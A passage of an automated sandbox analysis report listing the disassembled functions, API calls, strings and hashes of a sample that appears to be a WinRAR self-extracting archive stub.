                                                                                              control_flow_graph 1006 e6f826-e6f841 call e857d8 1009 e6f847-e6f84d 1006->1009 1010 e6f925-e6f935 FindNextFileW 1006->1010 1013 e6f851-e6f864 FindFirstFileW 1009->1013 1014 e6f84f 1009->1014 1011 e6f937-e6f946 GetLastError 1010->1011 1012 e6f948-e6f9fa call e625c3 call e614a7 call e7229d call e61a66 call e77c44 * 3 1010->1012 1015 e6f91d-e6f920 1011->1015 1018 e6f9ff-e6fa0a call e85787 1012->1018 1013->1012 1017 e6f86a-e6f88e call e7169a 1013->1017 1014->1013 1015->1018 1024 e6f890-e6f897 1017->1024 1025 e6f8ac-e6f8b6 1017->1025 1028 e6f89c-e6f8aa FindFirstFileW 1024->1028 1029 e6f899 1024->1029 1030 e6f8fd-e6f900 1025->1030 1031 e6f8b8-e6f8d3 1025->1031 1028->1025 1029->1028 1030->1012 1036 e6f902-e6f90b GetLastError 1030->1036 1033 e6f8f4-e6f8fc call e85726 1031->1033 1034 e6f8d5-e6f8ee call e619a9 1031->1034 1033->1030 1034->1033 1040 e6f90d-e6f910 1036->1040 1041 e6f91b 1036->1041 1040->1041 1045 e6f912-e6f915 1040->1045 1041->1015 1045->1041 1046 e6f917-e6f919 1045->1046 1046->1015
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E6F830
                                                                                              • FindFirstFileW.KERNELBASE(?,?,00000274,00E6F733,000000FF,00000049,00000049,?,?,00E6A684,?,?,00000000,?,?,?), ref: 00E6F859
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049), ref: 00E6F8A4
                                                                                              • GetLastError.KERNEL32(?,?,?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049,?,00000000), ref: 00E6F902
                                                                                              • FindNextFileW.KERNEL32(?,?,00000274,00E6F733,000000FF,00000049,00000049,?,?,00E6A684,?,?,00000000,?,?,?), ref: 00E6F92D
                                                                                              • GetLastError.KERNEL32(?,00E6D303,?,?,?,?,?,?,?,522FB702,00000049,?,00000000), ref: 00E6F93A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$H_prolog3_Next
                                                                                              • String ID:
                                                                                              • API String ID: 3831798110-0
                                                                                              • Opcode ID: 89d81960ae02b656af61afc05a16b76a228ee6d51e21c69b578ef69a2cef833f
                                                                                              • Instruction ID: 189771cc6ee7b846b8a9e3e77abba7fb8f01a9f42f874c059443fb490414ae57
                                                                                              • Opcode Fuzzy Hash: 89d81960ae02b656af61afc05a16b76a228ee6d51e21c69b578ef69a2cef833f
                                                                                              • Instruction Fuzzy Hash: FC515171904619DFCF14DFA4E888AEDB7B5BF49360F1052AAE419F3290DB31AA84CF50
                                                                                              Function 00E6BF3D Relevance: 5.0, APIs: 1, Strings: 1, Instructions: 1497COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00E6C342
                                                                                                • Part of subcall function 00E72095: __EH_prolog3_GS.LIBCMT ref: 00E7209C
                                                                                                • Part of subcall function 00E657C0: __EH_prolog3.LIBCMT ref: 00E657C7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3H_prolog3__wcslen
                                                                                              • String ID: __tmp_reference_source_
                                                                                              • API String ID: 1523997010-685763994
                                                                                              • Opcode ID: 69aa2f4c1f4b245ad5d68afe6652e409739819c46f77a6b57fca461246592d69
                                                                                              • Instruction ID: 57a7ab15e64234876800d0ac8d3a553f30392e6ada27aa71ac0eef24867b447e
                                                                                              • Opcode Fuzzy Hash: 69aa2f4c1f4b245ad5d68afe6652e409739819c46f77a6b57fca461246592d69
                                                                                              • Instruction Fuzzy Hash: 2BD2E370A842899FDB25DFB4D890BFEBBF4BF05348F14511AE49AB7241DB30A949CB50
                                                                                              Function 00E8ECAA Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00E8EC80,00000000,00EA6F40,0000000C,00E8EDD7,00000000,00000002,00000000), ref: 00E8ECCB
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00E8EC80,00000000,00EA6F40,0000000C,00E8EDD7,00000000,00000002,00000000), ref: 00E8ECD2
                                                                                              • ExitProcess.KERNEL32 ref: 00E8ECE4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: bdc7206f285f6183f1ed7c7f6a854d45cebf1488a15f4025d4f920645de522b9
                                                                                              • Instruction ID: 35ae3e5f1ecd8a1bed607b5d409aebe4122b78a5590da6f087c341c5e2c051aa
                                                                                              • Opcode Fuzzy Hash: bdc7206f285f6183f1ed7c7f6a854d45cebf1488a15f4025d4f920645de522b9
                                                                                              • Instruction Fuzzy Hash: 98E04632000248AFCF127F62CE08A587B69EF00386F502426F84CBA222CB36EC46CB50
                                                                                              Function 00E7B76F Relevance: .4, Instructions: 353COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID:
                                                                                              • API String ID: 431132790-0
                                                                                              • Opcode ID: a3c52e67136d008093f832026e3d2b5b2f06661177f18bed847ac890ce08ad96
                                                                                              • Instruction ID: d6ca4f137caf6ad724e247b29b01ceaba23b4a33e574cd3d541918935d120339
                                                                                              • Opcode Fuzzy Hash: a3c52e67136d008093f832026e3d2b5b2f06661177f18bed847ac890ce08ad96
                                                                                              • Instruction Fuzzy Hash: 2BE1A1715083448FDB24DF28C884B5BBBE5BF88308F08956DE99DAB346D734E945CB92
                                                                                              Function 00E80900 Relevance: 93.7, APIs: 43, Strings: 10, Instructions: 935windowfilesleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch_GS.LIBCMT ref: 00E8090A
                                                                                                • Part of subcall function 00E61E44: GetDlgItem.USER32(00000000,00003021), ref: 00E61E88
                                                                                                • Part of subcall function 00E61E44: SetWindowTextW.USER32(00000000,00E9C6C8), ref: 00E61E9E
                                                                                              • EndDialog.USER32(?,00000000), ref: 00E80A18
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E80A57
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E80A71
                                                                                              • IsDialogMessageW.USER32(?,?), ref: 00E80A84
                                                                                              • TranslateMessage.USER32(?), ref: 00E80A92
                                                                                              • DispatchMessageW.USER32(?), ref: 00E80A9C
                                                                                              • EndDialog.USER32(?,00000001), ref: 00E80ADE
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00E80B04
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E80B1F
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00E9C6C8), ref: 00E80B32
                                                                                              • SetFocus.USER32(00000000), ref: 00E80B39
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00E80C20
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00E80C4C
                                                                                              • GetTickCount.KERNEL32 ref: 00E80C79
                                                                                              • GetLastError.KERNEL32(?,00000011), ref: 00E80CD5
                                                                                              • GetCommandLineW.KERNEL32 ref: 00E80DF9
                                                                                              • _wcslen.LIBCMT ref: 00E80E06
                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,?,winrarsfxmappingfile.tmp,?,00EB5430,00000400,00000001,00000001), ref: 00E80E85
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00E80EA3
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00E80EDC
                                                                                              • WaitForInputIdle.USER32(?,00002710), ref: 00E80F0B
                                                                                              • Sleep.KERNEL32(00000064), ref: 00E80F25
                                                                                              • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,00EB5430,00000400), ref: 00E80F61
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00EB5430,00000400), ref: 00E80F6D
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E81072
                                                                                                • Part of subcall function 00E61E1F: GetDlgItem.USER32(?,?), ref: 00E61E34
                                                                                                • Part of subcall function 00E61E1F: ShowWindow.USER32(00000000), ref: 00E61E3B
                                                                                              • SetDlgItemTextW.USER32(?,00000065,00E9C6C8), ref: 00E8108A
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 00E81093
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00E810A2
                                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_000206D0,00000000,?), ref: 00E81422
                                                                                              • EndDialog.USER32(?,00000001), ref: 00E81436
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00E810B1
                                                                                                • Part of subcall function 00E7E265: __EH_prolog3_GS.LIBCMT ref: 00E7E26C
                                                                                                • Part of subcall function 00E7E265: ShowWindow.USER32(?,00000000,00000038), ref: 00E7E294
                                                                                                • Part of subcall function 00E7E265: GetWindowRect.USER32(?,?), ref: 00E7E2D8
                                                                                                • Part of subcall function 00E7E265: ShowWindow.USER32(?,00000005,?,00000000), ref: 00E7E373
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E8114F
                                                                                              • SendMessageW.USER32(?,00000080,00000001,0001042F), ref: 00E81284
                                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,0F050EA2), ref: 00E8129D
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 00E812A6
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00E812BE
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 00E812E6
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00E8135D
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E81371
                                                                                              • EnableWindow.USER32(?,00000000), ref: 00E815A7
                                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00E815E8
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00E8160D
                                                                                                • Part of subcall function 00E81D4F: __EH_prolog3_GS.LIBCMT ref: 00E81D59
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Message$TextWindow$Send$Dialog$ErrorFileLastShow$H_prolog3_LongView$CloseCommandCountCreateDispatchEnableExecuteFocusH_prolog3_catch_HandleIdleInputLineMappingParamRectShellSleepTickTranslateUnmapWait_wcslen
                                                                                              • String ID: -el -s2 "-d%s" "-sp%s"$<$@$@S$LICENSEDLG$STARTDLG$\S$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp$J
                                                                                              • API String ID: 3616063595-3051872833
                                                                                              • Opcode ID: adf4651aaef639d0f4834392abe7691a251a8dd020167f524058aca4f236a198
                                                                                              • Instruction ID: f6cbbde140a3e57e056b23b3bdce370fc57ac3383fc007742d208c07075b7cbf
                                                                                              • Opcode Fuzzy Hash: adf4651aaef639d0f4834392abe7691a251a8dd020167f524058aca4f236a198
                                                                                              • Instruction Fuzzy Hash: 7E72D271944348AEEB21FBB4DC4AFEE7BB8AB01344F045199F10DB7292D7B44A49CB21
                                                                                              Function 00E76D7B Relevance: 40.6, APIs: 16, Strings: 7, Instructions: 394libraryfileloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 470 e76d7b-e76dd1 call e85b20 GetModuleHandleW 473 e76dd3-e76de3 GetProcAddress 470->473 474 e76e28-e7708c 470->474 477 e76de5-e76dfb 473->477 478 e76dfd-e76e0d GetProcAddress 473->478 475 e77092-e7709d call e8e50e 474->475 476 e7719b 474->476 475->476 487 e770a3-e770b8 call e713f9 475->487 479 e7719d-e771be call e713f9 call e72117 476->479 477->478 478->474 481 e76e0f-e76e24 478->481 493 e771c0-e771cc call e7067e 479->493 481->474 494 e770bd-e770d5 CreateFileW 487->494 495 e770ba 487->495 502 e77203-e77234 call e614a7 call e7229d call e61a66 call e6ed1f 493->502 503 e771ce-e771dc call e76c5e 493->503 497 e77186-e77199 CloseHandle call e61a66 494->497 498 e770db-e770e7 SetFilePointer 494->498 495->494 497->479 498->497 500 e770ed-e77107 ReadFile 498->500 500->497 504 e77109-e77114 500->504 534 e77239-e7723c 502->534 503->502 517 e771de-e77201 CompareStringW 503->517 508 e773f2-e773f7 call e85ce1 504->508 509 e7711a-e7714d call e614a7 504->509 519 e77161-e77174 call e76366 509->519 517->502 520 e7723e-e77242 517->520 528 e77176-e77181 call e61a66 * 2 519->528 529 e7714f-e77156 519->529 520->493 523 e77248 520->523 526 e7724c-e77250 523->526 530 e77296-e77298 526->530 531 e77252 526->531 528->497 532 e7715b-e7715c call e76c5e 529->532 533 e77158 529->533 535 e7729e-e772b1 call e72187 call e7067e 530->535 536 e773bd-e773ef call e61a66 * 2 call e85734 530->536 538 e77254-e7728a call e614a7 call e7229d call e61a66 call e6ed1f 531->538 532->519 533->532 534->520 540 e7724a 534->540 556 e772b3-e77330 call e76c5e * 2 call e74318 call e76a25 call e74318 call e614a7 call e7ecf5 call e61549 535->556 557 e77332-e77366 call e76a25 AllocConsole 535->557 572 e77294 538->572 573 e7728c-e77290 538->573 540->526 574 e773b0-e773b7 call e61549 ExitProcess 556->574 567 e773ad 557->567 568 e77368-e773a7 GetCurrentProcessId AttachConsole call e77441 call e77436 GetStdHandle WriteConsoleW Sleep FreeConsole 557->568 567->574 568->567 572->530 573->538 577 e77292 573->577 577->530
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32,522FB702), ref: 00E76DC7
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00E76DD9
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00E76E03
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E770CA
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E770DF
                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 00E770FF
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00E77187
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,000000FF,DXGIDebug.dll,000000FF,?,?,?), ref: 00E771F8
                                                                                              • AllocConsole.KERNEL32 ref: 00E7735E
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00E77368
                                                                                              • AttachConsole.KERNEL32(00000000), ref: 00E7736F
                                                                                              • GetStdHandle.KERNEL32(000000F4,00000000,00000000,?,00000000), ref: 00E7738F
                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00E77396
                                                                                              • Sleep.KERNEL32(00002710), ref: 00E773A1
                                                                                              • FreeConsole.KERNEL32 ref: 00E773A7
                                                                                              • ExitProcess.KERNEL32 ref: 00E773B7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentExitFreeModulePointerReadSleepStringWrite
                                                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                              • API String ID: 2644799563-3298887752
                                                                                              • Opcode ID: 51eefe04c4d0c100f0b171c15a2c2b56c8d4a83552d4f3262a91cf226f33a2ab
                                                                                              • Instruction ID: 987059b7c381b7f71185956b4a9c0db450c4a03afdd8d725bdd3cf172096693b
                                                                                              • Opcode Fuzzy Hash: 51eefe04c4d0c100f0b171c15a2c2b56c8d4a83552d4f3262a91cf226f33a2ab
                                                                                              • Instruction Fuzzy Hash: A8F1A3B1408298DBCF21EFA4CC4ABDE3BA9BF45308F506119F95DBB291DB708649CB51
                                                                                              Function 00E83572 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 106windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00E80678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E80689
                                                                                                • Part of subcall function 00E80678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E8069A
                                                                                                • Part of subcall function 00E80678: IsDialogMessageW.USER32(0001043E,?), ref: 00E806AE
                                                                                                • Part of subcall function 00E80678: TranslateMessage.USER32(?), ref: 00E806BC
                                                                                                • Part of subcall function 00E80678: DispatchMessageW.USER32(?), ref: 00E806C6
                                                                                              • GetDlgItem.USER32(00000068,00000000), ref: 00E83595
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,00E7FD20,00000001,?,?), ref: 00E835BA
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00E835C9
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00E9C6C8), ref: 00E835D7
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E835F1
                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00E8360B
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E8364F
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00E83662
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00E83675
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00E8369C
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00E9C860), ref: 00E836AB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                              • String ID: \
                                                                                              • API String ID: 3569833718-2967466578
                                                                                              • Opcode ID: d4324a173597398750a315aa664ee556b450a116848a76fd232d32f247d058aa
                                                                                              • Instruction ID: a9c0a3bc6b0c5c99671d9b773a11a73cc2fe422fa001720a63695abadabf83d4
                                                                                              • Opcode Fuzzy Hash: d4324a173597398750a315aa664ee556b450a116848a76fd232d32f247d058aa
                                                                                              • Instruction Fuzzy Hash: 3531F47124A700BFE311EF29DC49F6B7BECEF85704F000659FA95B61A1D77099088BA6
                                                                                              Function 00E838A0 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 291windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 608 e838a0-e838bc call e857d8 611 e838c2-e838c8 608->611 612 e83bc7-e83bd4 call e61a66 call e85787 608->612 611->612 613 e838ce-e838f4 call e871f0 611->613 620 e838fd-e83909 613->620 621 e838f6 613->621 622 e8390b 620->622 623 e8390d-e83916 620->623 621->620 622->623 624 e83918-e8391b 623->624 625 e83924-e83927 623->625 626 e8391d 624->626 627 e8391f-e83922 624->627 628 e83929 625->628 629 e8392b-e83935 625->629 626->627 627->629 628->629 630 e8393b-e83948 629->630 631 e839ce 629->631 632 e8394a 630->632 633 e8394c-e83956 630->633 634 e839d1-e839d3 631->634 632->633 635 e83958 633->635 636 e8398c-e83999 633->636 637 e839dc-e839de 634->637 638 e839d5-e839da 634->638 641 e8396f-e83972 635->641 639 e8399b 636->639 640 e8399d-e839a7 636->640 642 e839ff-e83a11 call e71383 637->642 643 e839e0-e839e7 637->643 638->637 638->642 639->640 645 e839ad-e839b2 640->645 646 e83bd7-e83bdd 640->646 647 e8395a-e8395f 641->647 648 e83974 641->648 661 e83a29-e83a64 call e614a7 call e6ed0d call e61a66 642->661 662 e83a13-e83a20 call e78da4 642->662 643->642 649 e839e9-e839f5 643->649 655 e839b4 645->655 656 e839b6-e839bc 645->656 652 e83bdf 646->652 653 e83be1-e83be8 646->653 657 e83961 647->657 658 e83963-e8396d 647->658 648->636 650 e839fc 649->650 651 e839f7 649->651 650->642 651->650 652->653 659 e83bea-e83bf0 653->659 660 e83c00-e83c06 653->660 655->656 656->646 663 e839c2-e839c5 656->663 657->658 658->641 664 e83976-e8397b 658->664 667 e83bf2 659->667 668 e83bf4-e83bfd 659->668 670 e83c08 660->670 671 e83c0a-e83c14 660->671 681 e83a9d-e83aac ShellExecuteExW 661->681 682 e83a66-e83a95 call e614a7 call e70e49 call e61a66 661->682 662->661 676 e83a22 662->676 663->630 672 e839cb 663->672 665 e8397d 664->665 666 e8397f-e83989 664->666 665->666 666->636 667->668 668->660 670->671 671->634 672->631 676->661 684 e83b7c-e83b82 681->684 685 e83ab2-e83abc 681->685 716 e83a9a 682->716 717 e83a97 682->717 687 e83b84-e83b99 684->687 688 e83bb7-e83bc3 684->688 689 e83aca-e83acc 685->689 690 e83abe-e83ac0 685->690 692 e83b9b-e83bab call e619a9 687->692 693 e83bae-e83bb6 call e85726 687->693 688->612 695 e83ace-e83ad7 IsWindowVisible 689->695 696 e83ae5-e83af6 WaitForInputIdle call e83fcf 689->696 690->689 694 e83ac2-e83ac8 690->694 692->693 693->688 694->689 701 e83b30-e83b3b CloseHandle 694->701 695->696 702 e83ad9-e83ae3 ShowWindow 695->702 703 e83afb-e83b02 696->703 706 e83b4c-e83b53 701->706 707 e83b3d-e83b4a call e78da4 701->707 702->696 703->701 709 e83b04-e83b06 703->709 712 e83b6b-e83b6d 706->712 713 e83b55-e83b57 706->713 707->706 707->712 709->701 715 e83b08-e83b17 GetExitCodeProcess 709->715 712->684 714 e83b6f-e83b71 712->714 713->712 719 e83b59-e83b5f 713->719 714->684 720 e83b73-e83b76 ShowWindow 714->720 715->701 721 e83b19-e83b22 715->721 716->681 717->716 719->712 722 e83b61 719->722 720->684 723 e83b29 721->723 724 e83b24 721->724 722->712 723->701 724->723
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 00E838A7
                                                                                              • ShellExecuteExW.SHELL32(?), ref: 00E83AA4
                                                                                              • IsWindowVisible.USER32(?), ref: 00E83ACF
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00E83ADD
                                                                                              • WaitForInputIdle.USER32(?,000007D0), ref: 00E83AED
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00E83B0F
                                                                                              • CloseHandle.KERNEL32(?), ref: 00E83B33
                                                                                              • ShowWindow.USER32(?,00000001), ref: 00E83B76
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2310199497.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2309856294.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310775751.0000000000E9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310833078.0000000000EB2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2310981603.0000000000EB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_e60000_FS04dlvJrq.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
                                                                                              • String ID: .exe$.inf$\
                                                                                              • API String ID: 3208621885-439710875
